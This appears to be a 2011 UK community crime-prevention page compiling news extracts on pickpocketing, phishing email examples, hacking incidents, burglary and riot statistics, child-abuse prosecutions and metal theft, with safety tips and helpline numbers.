The articles on this page are either produced by the operator of the website, from national publishers or Government departments. Where the information is from an external source all information on the origins of the article will appear under the title.

We are currently investigating the Links on this webspage to see if they direct you to a website that will possibly download a 3rd party cookie to your computer. Your Browser or security software my be set up to prevent this download from taking place.

HAPPY NEW YEAR - SOME SUGGESTED RESOLUTIONS

- Test your smoke alarm and replace old batteries
- Always ensure that uPVC doors are locked correctly
- Keep computer security software up to date.
- Regularly check bank and credit card statements for fraudulent transactions.
- Shred unwanted bank, credit card and utility statements.
- Check that the tread on your car tyres meet the legal depth.
- Why not at least think about having that free household security check by your local Police Safer Neighbourhood Team !

(29th December 2011)



"HUGGER MUGGERS" : POLICE WARN OF "FRIENDLY" CRIMINALS
(BBC News, dated 26th December 2011)
www.bbc.co.uk

 

Criminals are mugging people on nights out in central London by pretending to be their friends but then stealing their belongings, police have said.

The groups have been nicknamed "hugger muggers" by Scotland Yard as they gather around revellers who have been drinking and give them hugs.

But they are actually feeling in their pockets and taking wallets, jewellery and other valuables, officers said. More than 160 such cases were reported in the West End in the past year.

The Metropolitan Police is trying to raise awareness of the practise and offenders have been issued with anti-social behaviour orders to ban them from busy areas.

One victim, who asked the BBC not to identify him, had his credit card stolen by "friendly" strangers at a bar. "I felt a bit stupid in a sense and naive that I'd actually allowed myself to get into that situation," the man said. He also described the "real anger and hurt" he felt as a victim of crime.

Det Sgt Chris Minnighan said the issue was "intrinsically linked to the night-time economy in Westminster". Police are "working tirelessly" to keep the West End as safe as possible, he added.

(29th December 2011)


 

MORE NEWS FROM MY SPAM INBOX- DECEMBER
Category : phishing
 
My Internet Service Providers (ISP) spam filter continues to do a good job. Apart from the BT phishing spam in early December the following have also been caught by my spam filter :

Barclays Bank - Subject : BA128732 Notification of Limited Account Access. Content : We need your help resolving an issue with your account. To give us time to work together on this, we've temporarily limited what you can do with your account until the issue is resolved. Click on attached bogus link. A major give away on this one was the e-mail address "barcllays.co.uk".

Santander - Subject : New Security Dedicated Server. Content : We have created a new dedicated security server to keep all our online banking customers account safe and secure. This server has been tested in most of our bank branches. Now we are asking all our online banking customers to register for the new security server to keep them safe. Click on attached bogus link.

Santander - Subject : Santander Online Banking - We've suspended your account. Content : Your account is suspended due to multiple number of incorrect login attempts. For your protection, we've suspended your account.
To reactivate your login access please download the form attached to your e-mail and confirm your details. If not completed until December 13, 2011, we will be forced to suspend your account. Malicious attachment included.

Co-operative Bank - Subject : Important Notification : Pending Transfer. Content : There is a pending transfer into your bank account from HM Revenue & Customs (HMRC)For Security Reasons We would Like you to confirm you account status and profile on file with us before the transfer can be completed. To confirm your account status for your safety and security you are required to use the reference Alert Code: ###########. Click on attached
bogus link.

Co-operative Bank - Subject : Alert:Co-operative Bank Online Notification. Content: Our online banking security noticed too many error login attempt to your online account. Your online account will be terminated if not verify with 24 hours. Please verify and prove account ownership. Click on attached bogus link.

Federal Insurance Company - Subject : FDIC: About your business account. Content : We have important information about your financial institution. Please click here to find information. This includes information on the acquiring bank (if applicable), how your accounts and loans are affected, and how vendors can file claims against the receivership. Click on attached bogus link.

DHL US - Subject : A package is available for reception. Content : Your package has been sent to your address.
Please find a post label attached which contains a track number of your package. Malicious attachment included.

These e mails are bogus and are just phishing for personal information. If you receive anything like thme, delete it immediately and do not open any attachments. If you are suspicious about activity on your bank or utility accounts, contact your bank direct or service provider using a known telephone number, NOT contact details within the bogus e-mails.

(29th December 2011)


 

CURRENT COMPUTER SECURITY NEWS - DECEMBER 2011

All links under this heading are [Note 1]

"ANONYMOUS" HACKERS HIT US SECURITY FIRM STRATFOR
(BBC News, dated 26th December 2011)

Full Article : As below

The activist hacker group Anonymous says it has stolen thousands of emails, passwords and credit card details from a US-based security think-tank.

The hackers claim they were able to obtain the information because the company, Stratfor, did not encrypt it.

They say Stratfor's clients include the US defence department, law enforcement agencies and media organisations.

The Austin-based company says it has now suspended the operation on its servers and email.

An alleged member of Anonymous posted an online message, claiming that the group had used Stratfor clients' credit card details to make "over a million dollars" in donations to different charities.

Stratfor later announced that it would keep its email and servers suspended for some time.

It also said the disclosure was "merely a list of some of the members that have purchased our publications and does not comprise a list of individuals or entities that have a relationship with Stratfor".

Anonymous has previously claimed responsibility for cyber attacks on financial institutions seen as enemies of the whistleblowing website Wikileaks.


 

PLANS TO MIGRATE LAPD TO GOOGLE CLOUD DROPPED
(Computer World, dated 22nd December 2011 author Jaikumar Vijayan)

Full Article : http://cwonline.computerworld.com/t/7777085/930454165/545433/0/

After more than two years of trying, the City of Los Angeles has abandoned plans to migrate its police department to Google's hosted email and office application platform saying the service cannot meet certain FBI security requirements.

As a result, close to 13,000 law-enforcement employees will remain indefinitely on the LAPD's existing Novell GroupWise applications, while other city departments will use the Google Apps for Government cloud platform.

Council members last week amended a November 2009 contract the city has with systems integrator Computer Science Corp. (CSC) under which CSC was supposed to have replaced LA's GroupWise e-mail system with Google's email and collaboration system. Under the amended contract, the LAPD will no longer move its email applications to Google.

Instead, Google will pay up to $350,000 per year for the LAPD to maintain its GroupWise licenses for the entire term of the CSC contract and any extensions beyond that. Google will also substantially reduce the amount it charges for the rest of the city's use of Google Apps. Under the amendment, CSC too will reduce its initial integration fee for the project by $250,000.


 

CHINESE HACKERS BREACHED US CHAMBER OF COMMERCE
( Computer World, dated 21st December 2011 author Jaikumar Vijayan)

Full Article : http://cwonline.computerworld.com/t/7774070/930454165/545204/0/


Chinese hackers once broke into computers at the U.S. Chamber of Commerce and had access to everything on the organization's systems, including information on about 3 million of its members.

A Chamber of Commerce spokesman this afternoon confirmed reports that the intrusion was discovered and shut down in May 2010, about a year after the hackers gained access to the business organization's networks.

According to a report in today's Wall Street Journal, investigators have been unable to determine specifically what information may have been compromised. However, it appears that the hackers targeted four Chamber employees who worked on Asia policy, the Journal said. About six weeks' worth of email belonging to those four employees is believed to have been stolen. In total, emails belonging to about 50 members of the Chamber appear to have been stolen, the Journal reported.

The highly targeted attack appears to have been carried out by an organized group of hackers thought to be affiliated with the Chinese government. The attackers appeared to know who to target and what data to go after, according to the Chamber's chief operating officer, David Chavern. The Journal story quotes Chavern as describing the attackers and their attack methods as being very sophisticated.


 

iBAHN, SUPPLIER OF HOTELS INTERNET SERVICES, DENIES BREACH
(Computer World, dated 15th December 2011 author Jeremy Kirk)

Full Article :  http://cwonline.computerworld.com/t/7758835/930454165/544323/0/

iBahn, a provider of internet services to some 3,000 hotels worldwide, denied on Thursday a news report that its network was breached by hackers.

Bloomberg wrote that a highly skilled group of hackers based in China, which U.S. investigators have called "Byzantine Foothold," attacked iBahn, citing unnamed sources, including one U.S intelligence official.

The alleged breach "may have let hackers see millions of confidential e-mails, even encrypted ones" from executives staying in hotels using iBahn's network, Bloomberg wrote.

The assertion came in an extensive story describing intensifying efforts by China-based backers to infiltrate computer systems of U.S. corporations to steal intellectual property.

In a written statement, iBahn said it was aware of the allegations in the news report but it had "not found proof of any breach on the iBahn network."

"iBahn takes the security and protection of its customers' information very seriously, provides its customers with the highest possible level of security, and relentlessly monitors attempted hacks," the company said. "As such, we are now gathering all relevant information regarding this matter and will provide updates as soon we learn more."


 

FOUR CHARGED WITH HACKING POINT OF SALE COMPUTERS
(Computer World, dated 8th December 2011 author Grant Gross)

Full Article :  http://cwonline.computerworld.com/t/7745511/930454165/543606/0/

Four residents of Romania have been charged for their alleged participation in a multimillion-dollar scheme to remotely access point-of-sale systems at more than 150 Subway restaurants and other U.S. merchants and steal payment card data, the U.S. Department of Justice said.

A POS system allows merchants to process customer purchases and typically includes a computer, monitor, credit-card processing system, signature capture device and a customer pin pad device. Merchant victims include more than 150 Subway restaurant franchises in the U.S. and 50 other retailers. The four compromised the payment card data of more than 80,000 customers and made millions of dollars worth of unauthorized purchases, the DOJ said.

The four-count indictment, unsealed Wednesday, charges the four Romanians with conspiracy to commit computer fraud, wire fraud and access device fraud. Charged in U.S. District Court for the District of New Hampshire were Adrian-Tiberiu Oprea, 27, of Constanta, Romania; Iulian Dolan, 27, of Craiova; Cezar Iulian Butu, 26, of Ploiesti; and Florin Radu, 23, of Rimnicu Vilcea.

Oprea was arrested last week in Romania and is in custody there, the DOJ said in a press release. Dolan and Butu were arrested upon their entry into the U.S. in August 2011 and remain in custody. Radu remains at large.

From 2008 until May 2011, Oprea, Dolan, Butu and Radu conspired to remotely hack into more than 200 U.S.-based merchants' point-of-sale (POS) or "checkout" computer systems in order to steal customers' credit, debit and gift card numbers and related data, the DOJ alleged. Compromised Subway restaurant systems were in New Hampshire, New York, California and elsewhere, according to the indictment.




SYMANTEC SAYS SPAM LEVELS FALL TO LOWEST IN THREE YEARS
(Computer World, dated 6th November 2011 author Jeremy Kirk)

 

Full Article : http://cwonline.computerworld.com/t/7740770/930454165/543156/0/


Global spam fell to the lowest level in three years in a sign that spammers may be getting a better rate of return by hitting social-media websites instead, according to the latest figures on Tuesday from Symantec.

About 70.5 percent of all email was spam, a still-high figure but one that is much lower than a few years ago, when it was well over 90 percent. Symantec calculated the percentage by analyzing some 8 billion messages it processed a day last month, according to the company's latest MessageLabs Intelligence Report.

Spam volumes dipped in March after Microsoft, law enforcement and other companies joined forces to take down Rustock, a large botnet responsible for sending up to 30 billion spam messages per day.

"Ever since then, nothing really filled the void," said Andy Watson, a senior software engineer at Symantec.

Botnets increasingly have come under law enforcement scrutiny. Other botnets including Coreflood and Kelihos were taken down this year, and two major ones, Waledac and Bredolab, were dismantled in 2010. A large affiliate spamming network called Spamit also shut down last year.

Watson said spammers may be putting more effort into social media sites because there is a better return. Spam links on services such as Twitter and Facebook can spread through users clicking on the links, Watson said.




EUROPEAN DISTRUST OF USE DATA SECURITY CREATES MARKET FOR LOCAL CLOUD SERVICE
(Computer World, dated 2nd December 2011 author Jennifer Baker)

 

Full Article : http://cwonline.computerworld.com/t/7736671/930454165/542801/0/

Concern in the European Union that U.S. data protection laws are too lax has created a new market for European cloud computing services.

A recent survey indicated that 70 percent of Europeans have concerns about their online data and how well companies secure it and now two Swedish companies, Severalnines and City Network, have begun promoting their newly merged service as "a safe haven from the reaches of the U.S. Patriot Act." Under the U.S. Patriot Act, data from European users of U.S.-based cloud services can secretly be seized by U.S. law enforcement agencies.


 

GCHQ TO TAKE HUB ROLE IN UK CYBERSECURITY
(ZD NET UK, dated 25th November 2011 author Jack Clark)

FUll Article :   http://nl.zdnet.co.uk/7G5e9BDaic/isFyc

The UK's intelligence agency GCHQ will become a main port of call for businesses dealing with cyberattacks, under the government's new cybersecurity strategy revealed on Friday.


The Cheltenham-based agency will get an infusion of hundreds of millions of pounds to fund its larger role in the UK's cyber-defence, Cabinet Office minister Francis Maude said in announcing the The UK Cyber Security Strategy (PDF). It will have a key role in a new cybersecurity 'hub' that will be set up as a brokerage for the public and private sectors to exchange information about threats and technologies.

With the new strategy, the government is aiming to make the UK one of the safest places in the world to do business, as well as tackling cybercrime and cyber-espionage in general, according to Maude. The document, the release of which has been delayed twice, replaces a two-year-old strategy and allocates £650m in funding to set up a National Cyber Security Programme.


"The growth of the internet has transformed our everyday lives," Maude said in a statement (PDF). "But with greater openness, interconnection and dependency comes greater vulnerability. The threat to our national security from cyberattacks is real and growing."



BILL WOULD ALLOW US INTELLIGENCE TO SHARE CYBER-THREAT INFO
(Computer World, dated 30th November 2011 author Grant Gross)

 

Full Article : http://cwonline.computerworld.com/t/7731141/930454165/542336/0/

A bill introduced by senior members of the House Intelligence Committee would allow intelligence agencies to share classified cyber-threat information with approved U.S. companies, while encouraging companies to share their own information.

The Cyber Intelligence Sharing and Protection Act, introduced Wednesday, is a "significant first step" toward protecting the U.S. government and businesses from constant cyberattackers, said U.S. Rep. Mike Rogers (R-Mich.), the committee chairman. Mike Rogers said: "There is a cyberwar that is going on today".

The bill would direct the U.S. director of national intelligence to set up a process for intelligence agencies to share cyber-threat information and for granting security clearances at organizations that want to receive the information. Businesses that receive the classified information would generally be limited in their use of the information to protecting themselves or their customers.

The bill would also give lawsuit protection to companies that use the information to protect their networks or share cyber-threat information. The bill would allow companies to share cyber-threat information anonymously through an undefined process or restrict those with whom they information, including the government.

UPDATE : COMMITTEE APPROVES CYBERSHARING BILL DESPITE PRIVACY CONCERNS
(Computer World, dated 2nd December 2011 author Grant Gross)

Full Article : http://cwonline.computerworld.com/t/7736671/930454165/542799/0/

The U.S. House of Representatives Intelligence Committee has approved a recently introduced bill that would allow greater cyberthreat information sharing between U.S. intelligence agencies and private companies even though privacy advocates say it would allow those agencies to spy on U.S. residents.


(29th December 2011)


 

AUSTERITY CRIMEWAVE HITS BRITAIN
(Sunday Times, dated 11 December 2011 authors David Leppard, Cat Flyn. Additional reporting Philip Cardy, Simon Trump and Adrian Craddock)
www.thesundaytimes.co.uk [Note1]

Note: The following are extracts from the above mentioned article.

Burglaries and robberies are on the rise as consumers looking for bargains fuel the market for stolen goods.

Britain is falling victim to an "austerity crimewave" with a sharp rise in the number of burglaries and robberies, new figures indicate.

Statistics collated for the Economic Policy Centre (EPC) an independent think tank, reveal there were 9% more burglaries across England and Wales in October than during the previous December. Thirty three of the 43 police forces in England and Wales saw an increase when figures for the to months were compared.

While only a snapshot of crime trends over the past year, the EPC survey, compiled using monthly crime figures given to police.uk website, provides further evidence of a marked increase in so-called acquisitive crime as the economic downturn worsens.

A seperate set of figures compiled by the Metropolitan Police across the 12 months to October shows a similar trend, with muggings across London up 14.8% compared with the same period last year. Burglaries in the capital rose by 8.8%.

However, some parts of the capital have experienced even more extreme spikes, with Bexley, Southeast London, up by 68.1% and burglaries up by 43.7% in Tower Hamlets, East London.

While some forces disputed the study's research methods, many citing the weather as a factor. The rise in the number of burglaries is broadly similar to that found by the Metropolitan Police.

Areas of London that saw substantial increases in muggings and burglaies in the 12 months to October 2011 include Redbridge (Northeast London) where muggings rose by 33%. Haering saw a rise of 31,9% and Lewisham (Southeast London ), 30.4%. In Kensington and Chelsea (West London) burglaries rose by 19.4%.

In Cleveland, the EPC research found an increase of 55.5% in the number of burglaries and of 22.7% in robberies.

In Devon and Cornwall where Home Office figures released earlier this year pointed to a fall in property crimes, the EPC survey suggested a 66.2% rise in the number of burglaries.

The EPC figures also indicate big increases in burglary in North Wales (41.1%), Warwickshire (25.4%), Derbyshire (41.4%) and South Wales (38.7%).

The increase in robberies is less dramtic although according to the EPC's data, Devon and Cornwall saw a 95.8% increase from 24 incidents last December to 47 in October. Some parts of LOndon using the Met's own methodology, saw a 43% rise in the number of muggings over the year to October 2011.

Home Office statistical models have previously identified a correlation between deteriorating economic conditions and acquisitive crimes such as burglary and robbery.

(29th December 2011)


 

HACKERS TAKE DOWN CHILD PORNOGRAPHY SITES
(BBC News, dated 24th October 2011)
www.bbc.co.uk

Hacktivist group Anonymous has briefly taken offline 40 sites it claims traded in images of child sexual abuse. As part of the action it published the names of 1,500 people who it says used a site known as "Lolita City".

The attacks were carried out as part of Operation Darknet which targeted abuse groups that swapped images via the Tor network. Experts condemned the attacks saying they could have scuppered ongoing investigations or tainted evidence.

Vigilante action
 
The Tor network tries to aid anonymity by routing web browsing queries through a series of servers scattered around the net. This makes it harder to trace users and monitor what they are seeing.

Many protestors, in nations such as Egypt and Syria, use Tor to hide their location from authorities.

One innovation, recently added to Tor, is the ability to create a "darknet" - a network that works in a similar way to the web but can be seen only by Tor users.

In early October, Anonymous hackers noticed that one site hosted on this Tor darknet contained links to images of child sex abuse.

Anonymous members removed the links but they were soon re-posted. It knocked the site offline with a denial of service attack and worked out which firm was hosting the links.

In a document detailing its actions, Anonymous said it ordered the firm to remove the illegal content. It claimed the the demand was refused, so it broke into the firm's network and shut down a series of computers hosting the abuse images.

It vowed to continue the attacks until the images and other content was removed.

The firm accused of hosting the content has yet to respond to a request for comment on the attacks.

Christian Sjoberg, boss of image analysis firm NetClean which helps police forces categorise images of abuse, said while removing images was laudable, hackers should think carefully about what they have done.

"It could be dangerous," he said, "because if its a big host the police will definitely know about it."

"If you think of these images as evidence of a crime that's published on the internet then the picture gets a bit more complicated," he said.

Graham Cluley, senior technology consultant at security firm Sophos, said the attacks were misguided.

"Take-downs of illegal websites and sharing networks should be done by the authorities, not net vigilantes," he said.

The attacks could have put an existing investigation at risk, stopped the police from gathering evidence they need to prosecute, or made it difficult to argue that evidence has not been corrupted, said Mr Cluley.

"The Anonymous hackers may feel they have done the right thing, but they may actually have inadvertently put more children at risk through their actions," he said.

(29th December 2011)


 

JOINT ACTION IN 22 EUROPEAN COUNTRIES AGAINST ONLINE CHILD SEXUAL ABUSE MATERIAL
(Europol, dated 16th December 2011)
www.europol.europa.eu

Law enforcement agencies from 26 European countries, supported and coordinated by Europol, have carried out a major crackdown against online child sex abuse file-sharing networks. So far 'Operation Icarus' has helped to identify 269 suspects and arrest 112 suspects, spread across 22 involved countries.*The operation targeted those sharing the most extreme forms of video material, which included babies and toddlers being sexually abused and raped. A lot of the material seized during the house searches is awaiting forensic examination in order to support follow-up investigations and possible prosecution of offenders. However, this operation has already uncovered previously unknown networks of child sex offenders operating on different internet channels.

'This is the latest major success in over 10 years of Europol supporting law enforcement agencies in Europe in their fight against child sex abuse online.  This operation shows how the internet is helping offenders to develop better techniques for sharing images on a global basis and for protecting their identity.  The problems involved are becoming harder to police and call for sustained efforts by policy-makers and law enforcement agencies to ensure that society's response remains strong and agile in this area.  Europol is committed to playing a leading part in this work
 through its unique capabiliites to develop intelligence and digital forensic skills across Europe and through the coordination of major international operations," says Rob Wainwright, Director of Europol.

Investigations are ongoing and more arrests are expected. Special focus will be on identifying the producers of the material, the suspects and their victims. Among those arrested for downloading illegal material was one who is suspected of grooming a young child, and was arrested before being able meet ths child face to face.

Operation Icarus is the first operation concluded under the auspices of the new action plan of the COSPOL Internet Related Child Abuse Material Project (CIRCAMP)**, an initiative by EU police chiefs led by Belgium and funded by the European Commission.

Cecilia Malmström, EU Commissioner for Home Affairs welcomed the joint action saying "These children are victims of multiple crimes. First, when the actual abuse takes place. Then, when it is filmed. And, thereafter, every time the images are posted, circulated or viewed. The joint action carried out under Europol coordination shows our commitment to backing the fight against this appalling crime. It highlights the importance of cooperation between law enforcement authorities at European and international level to tackle criminal activities that know no borders. We will continue to use all the tools at our disposal, including the recently adopted EU directive on the fight against pedo-pornography, sexual abuse and exploitation of minors, to support efforts to combat these horrendous crimes and to help protect our children".

Operation Icarus was initiated during a CIRCAMP meeting at the start of 2011. It was agreed that the National High Tech Crime Unit of the Danish Police (DK NITEC) should be the lead country and carry out the investigations because of its expertise in illegal material exchange through file sharing systems, known as peer-to-peer. After the collection of intelligence by the Danish National Police, an operational meeting was organised at Europol in September 2011, to disseminate intelligence packages to the involved EU Member States and countries with a Europol operational agreement.

Intelligence and additional information was disseminated by Europol through its secure information system in order to guarantee the integrity of data and to ensure a fast reaction in the concerned countries. Europol's cooperation network will also facilitate further investigations by involving partners such as Eurojust and Interpol when needed.

"Law enforcement agencies have to work together to combat the growing threat of cybercrimes against children, and we have to use the most advanced technology available. The complexity is huge and challenging - for example one of the Danish suspects had 29 terabytes of data that we seized. This is an incredible amount of data for our investigators to handle. To put it into perspective, that could hold about 9000 hours of high-quality video," says Jens Henrik Hoejbjerg, Danish National Commissioner of Police.

* The participating countries are: Austria, Belgium, Bulgaria, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Ireland, Italy, Luxembourg, Malta, Netherlands, Poland, Slovakia, Spain, Sweden, Croatia, Norway, Switzerland

** The members of CIRCAMP are: Belgium, Denmark, Finland, France, Germany, Ireland, Italy, Malta, Netherlands, Norway, Spain, Sweden, Europol and Interpol.

Further information

Virtual Globla Task Force : www.virtualglobaltaskforce.com
For UK : www.ceop.police.uk

(29th December 2011)


 

HAVE A MERRY CHRISTMAS

To all readers of this website. Have a MERRY CHRISTMAS and a SAFE and PROSPEROUS NEW YEAR.

If you are going away for Christmas consider the following :

- In case our crazy weather changes again to freezing. Ensure that your home keeps to an adequate temperature to prevent burst pipes.

- Ensure that all of your windows and doors are locked. Pay special attention to those double glazed ones.

- Have at least one light on a timer so that it comes on in the evening for a few hours to give the impression that someone is at home.


 

FIVE PEOPLE JAILED FOR ROLE IN INTERNATIONAL PAEDOPHILE RING
(The Guardian, dated 20th December 2011 source Press Association)
www.guardian.co.uk [Note 1]

A woman and four men have been jailed for their part in an international paedophile ring that committed "horrific" crimes against two young children in the UK and one in Australia.

The ringleader, Robert Hathaway, 37,from Portsmouth in Hampshire was given an indeterminate sentence of 12 years at Portsmouth crown court while his partner Melissa Noon, 30, received four years.

Judge Roger Hetherington told Hathaway he would not be released from prison for a minimum of six years and not until the parole board deemed him no longer to be a danger to children.

The three other defendants became involved by meeting the couple over the internet to carry out the abuse.

Stephen Fraser, 42,from Cambridge was sentenced to four years with an extended licence period of six years; Simon Hilton, 29, from north London was imprisoned for four years with an extended licence period of six years; and Lee Parson, 38, from Portsmouth was jailed for three years.

A six-week trial heard that the two young children in the UK were repeatedly abused by the group, who used a nudist website as a guise for their perversions.

Hampshire police launched their investigation into the ring after being tipped off by the authorities in Australia, who had uncovered a "mirror image" ring in Brisbane and Sydney, which also abused at least one young child.

Hathaway had been in contact with this ring and shared images with them and one of the charges faced by Noon was for encouraging the Australian child to engage in sexual activity.

A total of 2,000 pages of chat logs were uncovered by police, as well as 14,000 indecent images of children and 300 videos of children being abused.

The abuse included offences of rape and sexual assault as well as forcing the children to engage in naked games of Twister and wrestling.

As Kerry Maylin, prosecuting, described the offences committed by the defendants, sighs of disgust could be heard from the packed public gallery.

She said the victims were "systematically and repeatedly" raped by Hathaway and sexually assaulted on a daily basis.

The abuse was documented with thousands of photographs and videos, some as long as 42 minutes, which were distributed by Hathaway over the internet.

These included the abuse being carried out while the victims watched children's TV programmes and during bedtime stories, when they were seen to be reading books such as In the Night Garden.

Some of the abuse was streamed live over the internet using webcams to broadcast to paedophiles around the world who would reassure the victims that the behaviour was "normal".

Maylin said that among the videos of abuse found on Hathaway's computer was a cartoon in the style of The Simpsons aimed at training children in the ways of sexual abuse.

Describing Noon's role in the crimes, she said that as well as taking photographs of the offences for distribution on the nudist website that she ran, she also became involved, for example by taking part in the naked game of Twister with one of the victims.

Also, in a webcam conversation, Noon told the Australian victim to strip naked before telling the girl that she was her "little sweet princess" and she had an "adorable body".

When the girl asks to leave the conversation, Noon tells her: "Don't you go, I'm just getting hot."

Maylin said Noon was clearly "sexually excited".

In another internet conversation about child abuse with a female paedophile in Australia, Noon tells her that one of the UK victims "does not understand what this type of love is, she's too young, I will keep teaching her".

Speaking after the case, Maylin said: "This was a horrific case of systematic child abuse where the defendants subjected children as young as four to atrocious acts of sexual abuse and encouraged others across the world to commit similar offences."

Paul Walker, defending Noon, said she had learning difficulties and had an IQ of between 61 and 69, putting her in the bottom 1% for her age.

He said: "What that means is she is more vulnerable to manipulation and coercion."

He added that if it had not been for the influence of Hathaway's "manipulations", Noon would not have become involved in child abuse.

Stephen Smyth, defending Hathaway, said his client suffered depression and had been vulnerable to "outside influences" since the death of his mother when he was eight, and his father when he was 10.

"In his grey and miserable life, there was really nothing other than sex," Smyth said.

Jennifer Knight, defending Parson, a father of two, said he had an unhappy upbringing with his father who was an alcoholic, and his wife who was abusive and violent towards him.

Andrew Turton, defending Hilton, said he was suffering depression and had been lonely following a recent relationship breakdown.

He added that the IT consultant had become isolated in his work and social life which revolved around the internet, meaning "he was living a virtual life in a virtual world".

David Reid, defending Fraser, said his client accepted he had a sexual interest in children and was aware of the damage he had caused the children.

He added that he had stopped offending on his own accord as his serious offending had made him realise that what he was doing was wrong.

Reid said: "The most serious offences were, for him, a trigger. He describes it as making him sit up and realise the seriousness and he had no further contact."

Jon Brown, head of strategy and development for sexual abuse at the children's charity NSPCC, said that the case highlighted the depths to which some individuals will sink to produce such "appalling" images.

"The internet has made it much easier for people to access this kind of material so stopping this terrible trade is a huge task," he said.

"Every day babies and children are being assaulted and raped to feed the apparently insatiable demand for indecent photos and videos. And each time they are viewed, more degradation is heaped on the young victims."

About one in three of people convicted of possessing child abuse images has also committed other serious sex offences against children, said Brown, and it was "vital these people are identified and brought to the attention of the authorities".

He added: "Just as importantly, the young victims must get therapeutic treatment to help them overcome their terrible ordeals."

A further four defendants are to be sentenced for their part in the abuse next month.

Further information

If you have any suspicion about this type of crime taking place in your area. Call someone, even anonymously.

NSPCC ( Worried about a Child, report a concern ) : 0808 800 5000

Crimestoppers ( call anonymously ) : 0800 555 111

If you accidently access Child Abuse images on the internet let the Child Exploitation & Online Protection Centre (CEOP) know : www.ceop.police.uk

Protect your children against these type of people : www.thinkuknow.co.uk

Insafe - a European network of Awareness Centres promoting safe, responsible use of the Internet and mobile devices to young people : www.saferinternet.org

(22nd December 2011)


 

METAL THEFT BY NUMBERS

Numerical information from a a Sunday Times article dated 4th December 2011, entitled " Exposed: dealers cashing in on war memorials".

- The Association of Chief Police Officers estimates the total annual cost to the British economy of metal is £1bn.

- 300 war memorials are targeted by metal thieves each month, according to the War Memorials Trust.

- 7,000 thefts from the energy network in the past year have resulted in 290 hours of power cuts.

- 1,602 thefts of cabling between April and October led to 1,969 cancelled trains and 167 days worth of delays.

- 1,020 thefts, mostly of copper cabling reported from British Telecom's network this Summer.

- 10 churches a day are targeted by thieves. Church insurers have paid out £25m for 9,500 claims in the past five years.

Food for thought

When the article mentions a cost to the UK of £1bn. This is not only something that large multi-nationals claim from their insurance companies. These losses are also recouped from their customers...YOU !

During a telephone conversation broadcast on LBC (21st December 2011) a Police Inspector from the British Transport Police stated that the increase in metal thefts have been caused by the increase in its market price (ie. 1 ton of copper = £4,600 approx). He went on to say "the increase in price is as a result of demand from the "new" industrial nations".
So you could almost say that the increase in theft of metal is also having some form of affect on UK manufacturing job loses!

Society (US) remembers it's former residents who gave their lives for our freedoms now. Memorials are our history.

When our lights go out, when a hospital cannot operate through lack of power. Who does it affect ? US.

When train journies are constantly being delayed by signalling faults caused by cable theft does your employer say thats okay; or do they dock your pay ?

When a serious accident occurs on a motorway and the only means of contacting the emergency services is a landline. Who does it affect when the telephone cables have been stolen ? US.

Churches are not only places of prayer, many of them are hundreds of years old. They are the custodians of this countries history. Sadly, not only are they being hit by physical damage to their structure; they are also having their Church plate stolen (altar crosses, communion cups etc.). As a result churches are being locked outside service times. Who does that affect ? Parishers, Worshippers ....US.

(22nd December 2011)


 

 

UNDERCOVER STING FORCES ANTI-CORRUPTION CODE ON MEPS
(The Sunday Times, dated 4th December 2011 authors Jonathan Calvert and Heidi Blake)
www.thesundaytimes.co.uk [Note 1]

Strict anti-corruption rules are being introduced to the European parliament after a Sunday Times investigation that caught MEPs agreeing to accept secret payments to alter laws. The parliament voted last week to compel MEPs to disclose all outside earnings in excess of E5,000 (£4,296) a year and banned the receipt of gifts valued at more than E150.

It was part of a package of measures in the parliament's first code of conduct, which is designed to tighten the institutions notoriously lax rules.

Three MEPs, including a former deputy prime minister are being investigated by anti-corruption police in their home countries as a result of this newspapers expose.

They were forced to step down from the parliament after putting forward amendments to legislation on behalf of lobbyists who had offered them money.

The lobbyists were in fact undercover reporters investigating persistent rumours of MEPs being prepared to sell their services.

Under the new rules, which take effect in January, all MEPs will be forced to declare online all appointments and directorships, and any other paid work amounting to more than E5,000 a year. This will include all earnings for the three years before an MEP is elected. Declarations to the register must be disclosed within 30 days.

MEPs who breach the code face temporary suspenesion and, in extreme cases, removal from elected office. The code also allows special access to be removed from former MEPs who take jobs as lobbyists.

David Marting, the MEP who campaigned on the issue for the Socialists and Democrats said: " The european parliament has now adopted tougher rules than Westminister. It has made explicit rules where they were implicit before."

(22nd December 2011)


 

THE RIOT DATA SO FAR
(BBC News, dated 15th December 2011 author Dominic Casciani)

Full Article : www.bbc.co.uk/news/uk-14931987
Their source of information : Ministry of Justice

So what do we know with certainty about the rioters and looters? Are they a criminal, feral underclass or victims of socio-economic blight getting their own back on the rest of society?

Sadly, official statisticians and academics haven't thought of a way to measure such things accurately - as my colleague Mark Easton recently pointed out - but the people with the slide rules in the Ministry of Justice have given us the first real picture of the people now filling up the courts and prisons.

Their new figures cover those who have appeared before the courts. It may be stating the obvious but if someone hasn't had their collar felt, it is difficult to know a lot about them. What's more - the vast majority of those charged - 1,400 defendants - are still in the system. It will be months before we have the full facts on sentencing.

RIOTERS AGE PROFILE

Total Offenders = 1,715

Age Range

10 - 17 : 364 offenders
18 - 20 : 525 offenders
21 - 24 : 365 offenders
25 - 30 : 235 offenders
31 - 34 : 83 offenders
35 - 39 : 48 offendes
40 + : 95 offenders

CRIME COMMITTED DURING ENGLAND RIOTS

Burglary : 44%
Violent Disorder : 27%
Theft : 13%
Other disorder offences : 11%
Criminal damage : 2%
Robbery : 2%

PREVIOUS CONVICTIONS COMPARED

The statisticians say that 45% of juveniles who have appeared have had no recorded criminal history. We've also found out that 73% of all of those brought before the courts have criminal histories. Each defendant with a criminal record has committed an average of 15 offences. Roughly a quarter of them have committed 10 or more offences and about 15% had between six and 10 crimes on their record.

No previous convictions : 27.4%
One previous conviction : 10.2%
Two previous convictions : 7.4%
3-5 previous convictions : 14.7%
6-10 previous convictions : 14%
11-14 previous convictions : 6%
15-49 previous convictions : 15.4%
50+ previous convictions : 4.8%

PREVIOUS OFFENCES COMMITTED BY RIOT SUSPECTS

Theft and handling of stolen goods : 23.5%
Drug offences : 9.6%
Violence against the person : 6%
Burglary : 4.7%
Robbery : 3.6%
Other indictable offences : 13.9%
Summary and breach offences : 38.7%

Jailed London rioters named by Met Police

Details of 66 people jailed in connection with the summer riots in London have been published.

The Metropolitan Police has issued the names of those convicted of offences such as violent disorder, burglary and handling stolen goods.

Images of them have been published on the force's Flickr page : www.flickr.com/photos/metropolitanpolice [Note 1]

Four months on from the disorder in August, the force has made 3,423 arrests and 2,179 people have been charged or summonsed.

(22nd December 2011)


LONDON FIRE BRIGADE WARNS TO CHECK PIPES OVER CHRISTMAS
(BBC News, dated 20th November 2011)
